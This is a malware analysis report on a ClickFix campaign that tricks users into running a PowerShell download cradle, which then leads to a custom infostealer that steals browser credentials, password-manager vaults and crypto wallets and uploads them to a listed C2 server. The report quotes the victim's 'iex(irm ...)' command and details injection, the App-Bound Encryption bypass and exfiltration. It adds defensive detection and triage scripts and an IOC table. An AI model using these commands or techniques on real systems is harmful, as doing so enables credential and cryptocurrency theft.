# ClickFix Campaign – Russian Threat Actor Evolves to Custom InfoStealer

## Executive Summary

This report provides an update on the ongoing ClickFix campaign that was previously partially analyzed by myself and shared [internally](https://medium.com/@tarunrd77/when-verify-youre-human-becomes-malware-execution-0c6e9540779d). At the time of the earlier investigation, the final payload was identified as Vidar Stealer. Around the same period, the team at [LevelBlue](https://www.levelblue.com/blogs/spiderlabs-blog/how-clickfix-opens-the-door-to-stealthy-stealc-information-stealer) published a blog highlighting a separate ClickFix domain that followed the same multi-stage infection chain and leveraged the same download endpoint; their observed final payload was StealC. The current campaign instead delivers a new **custom stealer, VodkaStealer**.

In this current wave, the campaign demonstrates a **significant evolution** in both malware design and operational infrastructure:

* The final payload has transitioned to a **custom C/C++ stealer**, **hereafter referred to as VodkaStealer**, replacing previous commodity malware families.
* While the **download URL** remains consistent with prior campaigns, the **C2 infrastructure** has shifted geographically and technologically, now observed under a US-registered domain and IP.
* Operational behaviors such as a **Russian keyboard layout kill-switch**, **custom AES-CTR encrypted C2 communications**, and **fileless browser data exfiltration techniques** indicate a **financially motivated private actor**, rather than a generic Malware-as-a-Service operation.

Additional observations suggest that the actor is **Russian-speaking and operates within the CIS region**, with infrastructure rotation spanning Germany, Ukraine, and the USA. The malware is specifically designed to target **cryptocurrency wallets, browser credentials, and password manager data** using an extensive hardcoded list of browser extensions and wallet IDs.

In summary, the campaign reflects a **highly targeted, well-maintained, and evolving threat**, demonstrating advanced techniques for evading detection and maintaining persistence while focusing on high-value financial data.

## Key Findings

* **Campaign Evolution & Payload**
  * Previous final payloads: **Vidar Stealer** and **StealC**.
  * Current final payload: **VodkaStealer** (custom native C/C++ stealer).
  * Download URL remains unchanged, maintaining operational continuity.
  * C2 infrastructure rotated from **Germany → Ukraine → USA**.
* **Infection Chain**
  * Multi-stage execution process:
    * **Stage 0:** Compromised ClickFix domain with fake verification prompts.
    * **Stage 1:** PowerShell stager running in-memory scripts.
    * **Stage 2:** PowerShell loader performing process injection.
    * **Stage 3:** Donut shellcode loader downloading next-stage payload.
    * **Stage 4:** Final custom stealer.
  * Stealth techniques include **hidden windows**, **silent error handling**, and **process injection**.
* **System & Browser Targeting**
  * **Browsers:** Google Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, Chromium, Firefox, Waterfox, LibreWolf, Pale Moon.
  * **Credential theft:**
    * Extracts stored passwords, cookies, session data.
    * Specifically targets **password manager extensions** (Bitwarden, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, ZohoVault).
  * **Cryptocurrency wallets:** Over **120 targeted wallet extensions** including MetaMask, Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, and more.
* **Operational Security & Anti-Detection Features**
  * Russian keyboard layout kill-switch avoids domestic systems.
  * Mutex creation prevents multiple instances.
  * Uses **fileless techniques** and **in-memory execution** to evade AV detection.
  * Incorporates **Chrome ABE bypass** via open-source post-exploitation tool (`chromelevator.bin`).
  * Process injection into **svchost.exe** or self-injection fallback.
* **System Reconnaissance & Profiling**
  * Collects detailed system information:
    * Windows version, installation date
    * CPU, GPU, RAM, screen resolution
    * Locale, timezone, and username
    * Installed software enumeration (registry-based)
  * Creates staging directory for collected information.
  * Captures screenshots for situational awareness.
* **Exfiltration & Communication**
  * Establishes TCP connection to **178.16.55.40:5555**.
  * Performs **AES-CTR encrypted channel handshake** with hardcoded key `systeminfo_aes256_channel_key_2024!!`.
  * Recursively uploads all collected files after verification of server acknowledgment.
  * Cleans up local staging files post-exfiltration.
* **Persistence Indicators**
  * Creates **marker file `sysinfo_user_marker`** to log first execution date/time.
  * Prevents re-infection of the same system.
* **Attribution & Threat Actor Profile**
  * Likely Russian-speaking actor within the **CIS region**.
  * Highly targeted, financially motivated, private actor.
  * Operational sophistication surpasses standard commodity malware campaigns.

## Infection Chain

{% @mermaid/diagram content="flowchart TD

A\["ClickFix Domain"]
\--> B\["Victim Executes Malicious PowerShell<br>iex(irm -UseBasicParsing)"]

B --> C\["Stage 1: PowerShell Stager<br>Hidden Window, In-Memory Execution"]

C --> D\["Stage 2: PowerShell Loader<br>Downloads & Injects Payload"]

D --> E\["Stage 3: Donut Shellcode<br>Enables SeDebugPrivilege<br>Injects into svchost.exe"]

E --> F\["Stage 4: VodkaStealer (C/C++)"]

F --> G\["System Recon & Victim ID"]

F --> H\["Browser & Wallet Theft<br>Chromium + Firefox<br>120+ Crypto Wallets<br>Password Managers"]

F --> I\["Additional Data Theft<br>Telegram, FileZilla, OpenVPN"]

F --> J\["Bypasses Chromium App-Bound Encryption<br>(chromelevator.bin)"]

F --> K\["Data Staging in Temp Directory"]

K --> L\["C2 Communication<br>178.16.55.40:5555<br>AES-CTR Encrypted"]

L --> M\["Recursive Upload → Cleanup"]

M --> N\["Creates Marker File<br>sysinfo\_user\_marker"]" %}

## Technical Analysis

### Stage 0: ClickFix Domain

During recent hunting activity focused on ClickFix infrastructure, we identified continued campaign activity with notable payload evolution.

This campaign was previously partially analyzed and findings were shared internally. In the present iteration, although the payload has changed, the download URL pattern remains consistent with previously documented infrastructure, reinforcing linkage to earlier activity.

The domain observed in this wave is: captoolsz\[.]com. The domain appears to be compromised or otherwise controlled by a malicious actor and is used to present a fake verification prompt designed to socially engineer victims into executing a malicious command.

<figure><img src="/files/xozS2SXugLOI83OPUDwu" alt=""><figcaption></figcaption></figure>

The victim is instructed to execute a command that downloads and runs a remote PowerShell script directly in memory using: `powershell -c iex(irm -UseBasicParsing)`

Infrastructure rotation is evident. The previously documented IP address was 91.92.240.219, while the current observed IP is 158.94.209.33. This indicates active backend management and evasive rotation practices.

<figure><img src="/files/AOqmOm6TvXqFupT3aZPF" alt=""><figcaption></figcaption></figure>

### Stage 1: PowerShell Stager

The initial PowerShell stager displays the message: `“Wait please, don't close this window...”`

The script then spawns a new hidden PowerShell process using `New-Object System.Diagnostics.ProcessStartInfo`. The newly created process executes additional PowerShell code that retrieves and executes further payload content directly in memory.

<figure><img src="/files/KuE3UzdtyV4ngXzy3mA0" alt=""><figcaption></figcaption></figure>

The window style is explicitly set to hidden in order to prevent visible artifacts. If an error occurs during execution, exceptions are silently caught and suppressed, allowing the script to terminate without alerting the user. This behavior reflects deliberate operational stealth.
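The Stage 0 one-liner and the Stage 1 stager described above leave three observable traits in process-creation telemetry: a download cradle fed straight into `iex`, an explicitly hidden window, and PowerShell spawning a second PowerShell. The following is an added detection example written for this report (not code from the campaign or the author); the events are constructed samples, and the URLs in them are placeholders, not indicators.

```python
import re

# Rule regexes for the three Stage 0/1 traits described in the report.
CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I)
HIDDEN_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|windowstyle\s*=\s*['\"]?hidden", re.I)
POWERSHELL_RE = re.compile(r"(^|\\)(powershell|pwsh)\.exe$", re.I)

# Constructed process-creation events (Sysmon EID 1 / EDR shaped), NOT real telemetry.
# Event 1 is the ClickFix command typed by the victim; event 2 is the hidden child the
# stager spawns; events 3 and 4 are benign administrative PowerShell use.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -c iex(irm -UseBasicParsing http://stage1.invalid/v)"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass '
                     '-Command "iex(irm http://stage2.invalid/l)"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Process"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def classify(event):
    """Return the names of the rules a single process-creation event matches."""
    cmd = event.get("command_line", "")
    hits = []
    # Remote fetch whose result is evaluated in memory (Stage 0 cradle and Stage 1 loader).
    if CRADLE_RE.search(cmd) and FETCH_RE.search(cmd):
        hits.append("ps_download_cradle")
    # Hidden window. The stager sets this via ProcessStartInfo, so it may not always
    # appear on the command line; the rule also covers the -WindowStyle switch form.
    if HIDDEN_RE.search(cmd):
        hits.append("ps_hidden_window")
    # PowerShell launching PowerShell, as the stager does when it spawns its hidden child.
    if POWERSHELL_RE.search(event.get("image", "")) and \
            POWERSHELL_RE.search(event.get("parent_image", "")):
        hits.append("ps_spawns_ps")
    return hits


def scan(events):
    """Return (index, matched_rules) for every event that matches at least one rule."""
    flagged = []
    for i, event in enumerate(events):
        rules = classify(event)
        if rules:
            flagged.append((i, rules))
    return flagged


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, rules, SAMPLE_EVENTS[idx]["command_line"])
```

The cradle rule alone fires on the victim-typed command; the stager's child process trips all three, which is the combination worth alerting on with high confidence.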

### Stage 2: PowerShell Loader

The PowerShell loader retrieves a binary payload from the previously observed endpoint. Rather than executing the file in a conventional manner, the loader performs process injection, enabling the payload to execute in memory without standard disk-based execution artifacts.\
This stage marks the transition from script-based execution to native code execution, increasing complexity and reducing detection opportunities.

<figure><img src="/files/thErztqgjdujnlqAbHHd" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Sj1H8up9SC4cQNq4lbez" alt=""><figcaption></figcaption></figure>

### Stage 3: VodkaStealer Loader

The downloaded binary is identified as Donut-generated shellcode, consistent with earlier ClickFix campaign behavior. After decryption using a donut-decryptor, analysis shows that the payload immediately hides its execution window.

<figure><img src="/files/OrTTggI2ekEfMwzswreN" alt=""><figcaption><p>die.exe</p></figcaption></figure>

The malware calls AdjustTokenPrivileges with SeDebugPrivilege enabled, granting debug privileges required for advanced process injection techniques.

<figure><img src="/files/dLtgQbmJfU7aEWzkjedG" alt=""><figcaption></figcaption></figure>

Two primary functions are executed at this stage. The first function downloads the next-stage payload, and the second function locates svchost.exe and performs process injection into it.

<figure><img src="/files/HEk3CxQQe62EgQGaxC2G" alt=""><figcaption></figcaption></figure>

The endpoint used to download the next stage is `http[:]//94.157.35.115/user_profiles_photo/cptchbuild.bin`, which matches previously documented infrastructure.

<figure><img src="/files/d8gVCF2IUkYhWQrHRzy5" alt=""><figcaption></figcaption></figure>

### Stage 4: VodkaStealer

The final payload is again delivered as Donut shellcode. After decryption, the previously used Vidar Stealer is found to have been replaced with **VodkaStealer, a custom native C/C++ stealer.**

<figure><img src="/files/sycVLsmHk7cLNklvRtRq" alt=""><figcaption><p>die.exe</p></figcaption></figure>

The stealer begins by hiding its execution window.

<figure><img src="/files/rEy36kqHTfF0nQzS6lJV" alt=""><figcaption></figcaption></figure>

It checks the current keyboard layout and terminates execution if the layout is Russian. This behavior suggests either Russian-speaking threat actors or intentional avoidance of infecting Russian systems.

<figure><img src="/files/es2EFnMeKSVKLrke8nwa" alt=""><figcaption></figcaption></figure>

A mutex named sysinfo\_single\_instance is created to prevent multiple instances of the VodkaStealer from running on the same system.

<figure><img src="/files/SLLEzvKriVYjJmVMqSQo" alt=""><figcaption></figcaption></figure>

The VodkaStealer iterates through eight Chromium-based browsers: Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Chromium. It checks whether these browsers are installed and then searches for specific hardcoded extension IDs within each browser profile. If matching extensions are found, the browser index is stored for further processing.

<figure><img src="/files/1HLTJtaftToUIEcvu4fe" alt=""><figcaption></figcaption></figure>

VodkaStealer enumerates running processes, identifies active browser processes, and terminates them to unlock browser database files before extracting stored credentials and wallet data.

<figure><img src="/files/VemX6UO1Z4m48o7ZfE4f" alt=""><figcaption></figcaption></figure>

The stealer queries ip-api.com/json to retrieve the victim’s public IP address and country code.

<figure><img src="/files/maTSfMMIENXychc9ZDUy" alt=""><figcaption></figcaption></figure>

It generates a victim identifier using the MachineGuid value and retrieves the current UserName.

<figure><img src="/files/NgGVnppfeO1VN8sX8xdx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/t5VV653TLwHJDaihOXTY" alt=""><figcaption></figcaption></figure>

System reconnaissance includes collecting the Windows product name, installation date, CPU name, CPU core count, GPU information, RAM size, screen resolution, locale information, and time zone using registry queries and Windows APIs.

<figure><img src="/files/uS0seIOy8ZWrnQnh2dIu" alt="" width="375"><figcaption></figcaption></figure>

<figure><img src="/files/OpdoyJuQB3YyCMB46JKG" alt="" width="319"><figcaption></figcaption></figure>

A working directory is created in the Temp folder for staging collected information. Its name follows the format `sysinfo_countrycode_ipaddr_DayMonthYearHourMinute`, for example: `sysinfo_IN_8.8.8.8_18020261010`

<figure><img src="/files/P4wGlmzEO7RnFcsxjZXo" alt=""><figcaption></figcaption></figure>

VodkaStealer creates InstalledSoftware.txt and queries the registry paths SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and SOFTWARE\WOW6432Node\Windows\CurrentVersion\Uninstall to enumerate installed applications. The collected software information is written to InstalledSoftware.txt.

<figure><img src="/files/ilFem6tZBsHe4i6YMqea" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/dsYpM09Sc7xSBU7RdjBf" alt=""><figcaption></figcaption></figure>

VodkaStealer then proceeds to collect data from Chromium-based browsers, focusing on cryptocurrency wallet extensions and password managers.

<figure><img src="/files/aB063wtIcih4rhgIGlaB" alt=""><figcaption></figcaption></figure>

A screenshot of the victim machine is captured and saved in the staging directory.

<figure><img src="/files/J9Zz2P4kM7nabS5CTW3H" alt=""><figcaption></figcaption></figure>

The malware then downloads chromelevator.bin from `http[:]//94.157.35.115/user_profiles_photo/chromelevator.bin`.

<figure><img src="/files/D7x9LkKVHrachauSxZHb" alt=""><figcaption></figcaption></figure>

It attempts to locate svchost.exe and inject the payload using process injection. If injection into svchost.exe fails, it performs self-injection.

The chromelevator.bin component is an open-source post-exploitation tool designed to bypass Chromium’s App-Bound Encryption (ABE). It uses direct syscalls and reflective process hollowing to launch a legitimate browser process in a suspended state and inject a payload to hijack its security context. This fileless technique enables decryption and exfiltration of sensitive Chromium data, including cookies, saved passwords, and payment information.

The tool is open-source and available at <https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption>

<figure><img src="/files/fURgioMLZDcFZoRw9Y9v" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/zhjgyV755enLqTNTKhas" alt=""><figcaption></figcaption></figure>

VodkaStealer also checks for the presence of Firefox-based browsers, including Firefox, Waterfox, LibreWolf, and Pale Moon. It attempts to harvest credentials and cookies by extracting logins.json, key4.db, cookies.sqlite, and related certificate databases from their profile directories.

<figure><img src="/files/fHfabbbLL0jyytjvzXjN" alt=""><figcaption></figcaption></figure>

In addition to standard browser credential theft, the malware specifically targets Chromium-based password manager extensions. It searches for hardcoded extension IDs associated with password managers including Bitwarden, RoboForm, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, and ZohoVault. If these extensions are installed, the malware attempts to extract stored vault data and associated extension storage files.

VodkaStealer separately targets cryptocurrency wallet browser extensions. It contains an extensive hardcoded list of more than 120 wallet extension IDs. Targeted wallets include MetaMask (multiple IDs), Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, Ronin, Keplr, Rabby, Exodus, Zerion, SafePal, Rainbow, Tonkeeper, Uniswap, XDEFI, Crypto.com, Hashpack, Gero, MathWallet, TrezorPassword, TronLink, TokenPocket, BybitWallet, BackpackWallet, MagicEdenWallet, Temple, PetraAptos, MartianAptos, and PontemAptos.

The malware also collects FileZilla credentials, Telegram Desktop session data, and OpenVPN Connect profiles. All collected data is staged within the central working directory.

<figure><img src="/files/zxuNFLYHUwkPjkmcNg5P" alt=""><figcaption></figcaption></figure>

It creates a file called systeminfo.txt and writes the collected information shown below into it.

<figure><img src="/files/F6ecWQjm1ccw5y52Wysr" alt=""><figcaption></figcaption></figure>

For exfiltration, the malware validates the target directory and establishes a TCP socket connection to 178.16.55.40 on port 5555. It performs a custom AES-based handshake and establishes two AES-CTR encrypted communication channels. The hardcoded encryption key used is “systeminfo\_aes256\_channel\_key\_2024!!”.\
The staging directory structure looks as follows:

```
C:\Users\Username\AppData\Local\Temp\sysinfo_countrycode_ipaddr_DayMonthYearHourMinute\
│
├─InstalledSoftwares.txt
├─systeminfo.txt
├─screenshot.jpg
├─BrowserWallets
│  ├─Chrome
│  │  ├─Default
│  │  │  ├─WalletData.db
│  │  │  ├─extension_storage.json
│  │  │  └─cookies.json
│  │  └─Profile1
│  │     ├─WalletData.db
│  │     ├─extension_storage.json
│  │     └─cookies.json
│  ├─Edge
│  │  └─Default
│  │     ├─WalletData.db
│  │     ├─extension_storage.json
│  │     └─cookies.json
│  └─OtherBrowsers(Brave,Opera,Vivaldi)
│
├─BrowserPassManagers
│  ├─Bitwarden
│  │  ├─vault.json
│  │  └─local_storage.json
│  ├─LastPass
│  │  ├─vault.json
│  │  └─local_storage.json
│  ├─1Password
│  └─KeePassXC
│
├─DesktopWallets
│  ├─MetaMask
│  │  ├─wallet.json
│  │  └─keyfile.json
│  ├─TrustWallet
│  └─CoinbaseWallet
│
├─PassManagers
│  ├─Dashlane
│  ├─Keeper
│  ├─MYKI
│  └─ZohoVault
│
├─Browsers
│  ├─Chrome
│  │  ├─Default
│  │  │  ├─cookies.json
│  │  │  ├─logins.json
│  │  │  ├─key4.db
│  │  │  └─fingerprint.json
│  │  └─Profile1
│  │     ├─cookies.json
│  │     ├─logins.json
│  │     ├─key4.db
│  │     └─fingerprint.json
│  ├─Edge
│  │  └─Default
│  │     ├─cookies.json
│  │     ├─logins.json
│  │     ├─key4.db
│  │     └─fingerprint.json
│  ├─Firefox
│  │  ├─Profiles
│  │  │  ├─logins.json
│  │  │  ├─key4.db
│  │  │  ├─cookies.sqlite
│  │  │  └─cert9.db
│  │  ├─Waterfox
│  │  ├─LibreWolf
│  │  └─PaleMoon
│  ├─Brave
│  ├─Opera
│  └─Vivaldi
│
├─Telegram
│  └─SessionData.json
├─FileZilla
│  └─credentials.xml
└─OpenVPN
   └─profiles
       ├─client.ovpn
       └─credentials.txt
```

<figure><img src="/files/2xThuNOGdDMRgMFjqjJK" alt=""><figcaption></figcaption></figure>

The victim identifier is transmitted to the C2 server, and the malware recursively uploads the staged directory contents. It waits for an “OK” confirmation from the server before cleaning up and deleting all staged files.

<figure><img src="/files/BuTtN1uPcuR23ftsmp4p" alt=""><figcaption></figcaption></figure>

Finally, the malware creates a marker file in the Temp directory named sysinfo\_user\_marker. The file records the first execution time in the format “First run: DD/MM/YYYY HH:MM:SS”. This marker is used to indicate that the system has already been infected and processed.
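Two host artifacts described in this report are easy to triage for: the `sysinfo_<CC>_<ip>_<timestamp>` staging directory in Temp and the `sysinfo_user_marker` file with its "First run:" line. Because staged files are deleted after a successful upload, the marker is the durable indicator, while a staging directory that is still present suggests an interrupted or in-progress exfiltration. The script below is an added triage example (not code from the report or the malware) that builds a constructed Temp layout from the report's own sample names and walks it; the timestamp is kept raw because the report's sample value has eleven digits and is not parsed further.

```python
import os
import re
import tempfile

# Naming schemes described in the report: staging dir and first-run marker file.
STAGING_RE = re.compile(
    r"^sysinfo_(?P<cc>[A-Z]{2})_(?P<ip>\d{1,3}(?:\.\d{1,3}){3})_(?P<ts>\d{10,12})$")
MARKER_NAME = "sysinfo_user_marker"
MARKER_RE = re.compile(r"^First run: (\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})")


def parse_staging_name(name):
    """Return {'cc', 'ip', 'ts'} for a VodkaStealer-style staging dir name, else None."""
    m = STAGING_RE.match(name)
    return m.groupdict() if m else None


def parse_marker(text):
    """Extract the first-run timestamp from the marker file contents, else None."""
    m = MARKER_RE.match(text.strip())
    return m.group(1) if m else None


def triage_temp(temp_dir):
    """Walk one user's Temp directory and report staging dirs and the infection marker."""
    result = {"staging_dirs": [], "marker_first_run": None}
    for entry in sorted(os.listdir(temp_dir)):
        path = os.path.join(temp_dir, entry)
        if os.path.isdir(path):
            info = parse_staging_name(entry)
            if info:
                # Count staged files so a partially cleaned directory is still visible.
                files = sum(len(names) for _, _, names in os.walk(path))
                result["staging_dirs"].append({"name": entry, **info, "file_count": files})
        elif entry == MARKER_NAME:
            with open(path, encoding="utf-8", errors="replace") as fh:
                result["marker_first_run"] = parse_marker(fh.read())
    return result


def demo():
    """Build a constructed Temp layout (sample data, not a real infection) and triage it."""
    with tempfile.TemporaryDirectory() as root:
        staging = os.path.join(root, "sysinfo_IN_8.8.8.8_18020261010")
        os.makedirs(os.path.join(staging, "BrowserWallets", "Chrome", "Default"))
        for rel in ("systeminfo.txt", "screenshot.jpg",
                    os.path.join("BrowserWallets", "Chrome", "Default", "cookies.json")):
            open(os.path.join(staging, rel), "w").close()
        os.mkdir(os.path.join(root, "sysinfo_not_a_match"))  # decoy that must not match
        with open(os.path.join(root, MARKER_NAME), "w") as fh:
            fh.write("First run: 18/02/2026 10:10:00\n")
        return triage_temp(root)


if __name__ == "__main__":
    print(demo())
```

On a live host, point `triage_temp` at each user's `%LOCALAPPDATA%\Temp` instead of the constructed directory.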

<figure><img src="/files/auCPw09gdqOG0lmqH2n0" alt=""><figcaption></figcaption></figure>

## IOC

| Indicator                                     | Value                                                            |
| --------------------------------------------- | ---------------------------------------------------------------- |
| ClickFix Domain                               | captoolsz\[.]com                                                 |
| Stealer Download URL                          | http\[:]//94.157.35.115/user\_profiles\_photo/cptchbuild.bin     |
| Chromium ABE bypass component                 | http\[:]//94.157.35.115/user\_profiles\_photo/chromelevator.bin  |
| Current ClickFix C2 / staging IP              | 158.94.209.33                                                    |
| Previous infrastructure IP                    | 91.92.240.219                                                    |
| Current TCP socket C2 server for exfiltration | 178.16.55.40:5555                                                |
| Mutex                                         | sysinfo\_single\_instance                                        |
| Stealer Loader Download URL                   | http\[:]//94.157.35.115/user\_profiles\_photo/cptch.bin          |
| cptchbuild.bin                                | 4f6afc69c3151bbc71f86417dbf8cca0eed89b47c66d3e0d8712bfd4eba87a00 |
| cptch.bin                                     | f9eb41e9989ac7ce9c1ece15a7e7c4a0adef1434444598f28c6ba5d20daf1352 |
| chromelevator.bin                             | c8dbd5335dc0828556e6abc2a804121bf65240719a8a3388a5af6b65065a2d5b |
| decrypted\_cptch.bin                          | 6437db6158ee8fa2d316ba3625ca8df6afdb9304bb3c1e6ee4fb0bcdabb7f212 |
| decrypted\_cptchbuild.bin                     | 8720d5388e561835e5496498f61de3132e6e63f2d47964ace897ecb528e2fec3 |
